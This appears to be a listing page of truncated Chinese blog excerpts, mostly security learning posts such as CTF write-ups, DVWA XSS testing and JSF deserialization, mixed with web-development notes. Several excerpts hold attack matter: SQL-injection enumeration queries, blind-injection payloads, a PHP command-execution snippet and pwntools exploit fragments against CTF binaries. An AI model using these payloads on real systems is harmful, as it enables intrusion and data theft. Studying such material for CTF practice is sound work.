以DVWA应用为目标,测试目标URL是否存在XSS漏洞,其基本思想是: 1. 利用session登录DVWA应用 2. 下载目标URL网页,并提取出表单以及input等名称 3. 构造请求,并将XSS测试语句作为表单的提交内容 import requests from lxml import etree import sys c
dva 基于 redux 和 redux-saga 的数据流方案,然后为了简化开发体验,今天就讲一下具体的使用 实现的效果:计算器的同步增减及异步修改数据 1.创建ui component return ( <> <div> 测试组件 Option:<input ref={inputRef} def
Java安全之jsf 反序列化 前言 偶遇一些奇葩环境,拿出来炒冷饭 JSF简述 JSF”指的是2004年发布的第一个版本的Java规范。这方面的许多实现 规范存在。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFaces JavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使
SQL注入 通用 select user(),version(),database() select group_concat(schema_name) from information_schema.schemata select group_concat(table_name) from information_schema.tables where table_schema=database() select group_concat(column_name) from information_sc
场景 Node-RED简介与Windows上安装、启动和运行示例: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/121884766 Node-RED怎样导出导入流程为json文件: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/124130985 Node-RED中函式节点可以建立JavaScript函
JWT的原理及使用 介绍: # jwt 一般用于用户认证(前后端分离,微信小程序,uniapp)的开发 json web token 认证流程。 1. 区别 传统认证 用户登录,服务端返回token,并将token保存在服务端 以后用户再来访问,需要携带token,服务端获取token后,再去数据库中获取token进行校验。 jwt认
-第一种方案,自己写登录接口 -第二种写法,用内置,控制登录接口返回的数据格式 -jwt的配置信息中有这个属性 'JWT_RESPONSE_PAYLOAD_HANDLER': 'rest_framework_jwt.utils.jwt_response_payload_handler', -重写jwt_response_payload_handler,配置成咱们
# 3 自定义基于jwt的权限类 from rest_framework.authentication import BaseAuthentication # 基于它 from rest_framework_jwt.authentication import BaseJSONWebTokenAuthentication # 基于它 from rest_framework.exceptions import AuthenticationFailed # from rest_fram
from rest_framework_jwt.authentication import BaseAuthentication,BaseJSONWebTokenAuthentication from rest_framework.exceptions import AuthenticationFailed from rest_framework_jwt.authentication import jwt_decode_handler from rest_framework_jwt.authenticat
0x001 waf介绍 Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF) 核心目的:防御网站被入侵。 具体手段:检测到你的入侵者,然后拦截你当前访问的页面或者是跳转其他页面,或者是直接禁止你的ip访问。 日常生活中,有些网站不一定安装了WAF,但是他可能会
前言 今天遇到个有意思的SQL盲注,花了不少功夫,也学到了新姿势,遂记录下来以备后续碰到相同场景使用。 题目 这是2021 虎符杯的一道web题,有一个目标站点且附带了源码。 源码内容包括: 主要逻辑在login.php 与config.php,删去多余代码,主要功能在登陆上。 前端登录表单会发送给login.php
前言 代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下 命令执行函数 E.g.1 <?php error_reporting(0); show_source(__FILE__); $a = "$_GET[c]"; $b = "$_GET[d]"; $array[0] =$b; $c = array_map($a,$array); ?> 传入参
简单原理实现 讲解 看了Vuex源码文件,发现确实很多,我这里就讲我们最常用的部分功能的源码吧 其实使用过 Vuex 的同学都知道,我们在页面或者组件中都是通过this.$store.xxx 来调用的,那么其实,我们只要把你所创建的store对象赋值给页面或者组件中的$store变量即可 Vuex的原理
ret2libc 1 exp from pwn import * p = process('./ret2libc1') elf = ELF('./ret2libc1') system_plt = elf.plt["system"] bin_sh = next(elf.search(b"/bin/sh")) payload = b'A'*112 + p32(system_plt) + b'A
昨日回顾 # 1 自定义了频率类 # 2 自动生成接口文档 # 3 jwt:三部分组成:头+荷载(用户数据)+签名 # 4 drf中使用jwt:djangorestframework_jwt -路由里配了一条 # 作业 1 自定义User表,新增mobile唯一约束字段;新增icon图片字段 2 在自定义User表基础上,用 GenericViewSet + CreateMod
rip 使用checksec查看: 保护措施全部关闭。 放进IDA中分析: gets():存在栈溢出 fun(): 存在后门函数 步骤解析 s 距离 rbp 0xF,无canary,直接覆盖即可 完整exp from pwn import * p = process("../buu/rip") # p = remote("node4.buuoj.cn",27965) elf = ELF("../buu/rip")
最近才开始接触”pwn“这个东西,这是近两天做的一个题目,然后就想着记一下。 好的,不如正题, 直接nc连接返回空白,然后直接退出,用kali的checksec工具或者是die检测一下附件, 看到有NX,然后是一个64位的应用程序,拖入ida查看,shift+f12看相应的字符串 看到了/bin/sh,
Golang 盲注脚本 payload部分 其中脚本最重要的环节就是payload部分了,需要如何去闭合,如何构造SQL语句来达到判断的效果。(还有如何绕过waf等等。。。) bool盲注 下面是最基础的布尔型盲注的payload ' and length(database()=n)--+ ' and (ascii(substr(database(),1))=110 --+ '
首先要打开 F12 进入调试模式 然后 查看是用什么方法获取的 如果是Json: yield Request( url="xxxxx.com", method="POST", body=json.dumps(data), headers={'Content-Type': 'application/json'}, callback=self.parse_json, ) 如果是 其他
首先打开题目 只有一个Hack me,然后抓包 没有得到什么,不过title里面有个bot 于是联想到robots.txt User-agent: * Disallow: /fAke_f1agggg.php 然后打开Fake_flagggg.php 然后在抓包结果看一下,发现了 Look_at_me: /fl4g.php 于是我打开fl4g.php
这道题惊喜点在于.so文件也可以拖到ida里逆向,服! 下面是题解过程: 左边发现奇怪的callme-one,two,three. 但是人家动态链接了,不知道内容是什么就无法利用,使用ida,把so文件拽里面 告诉我们,按这个参数就correctly了。 下面反倒过程平平无奇了 使用ROPgadget 找到三个参数的pop rdi
文中通过详细讲解CobaltStrike工具,更加深入的掌握CobaltStrike用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。 Cobalt Strike 与
目录 RTT 乱序重传 工作中需要计算tcp 的rtt和重传连续包,以下是我们计算的方法。 RTT Round trip time 往返时间 (RTT),是网络请求从起点到达目的地并再次返回起点所需的持续时间。 在tcp中是发送包到与接收到与此数据包对应的ack包的持续时间,在我们的计算中对于下图第三种情况,
使用jwt自带的登录认证obtain_jwt_token,只返回了一个token 我们需要自定义认证返回结果: common.py # 写一个函数,函数的返回值,就是响应的格式 # 在配置文件中配置一下 def jwt_response_payload_handler(token, user=None, request=None): return { 'co
第一关 源码分析 $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; //直接输出,无任何过滤措施 构造payload 第二关 源码分析 $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars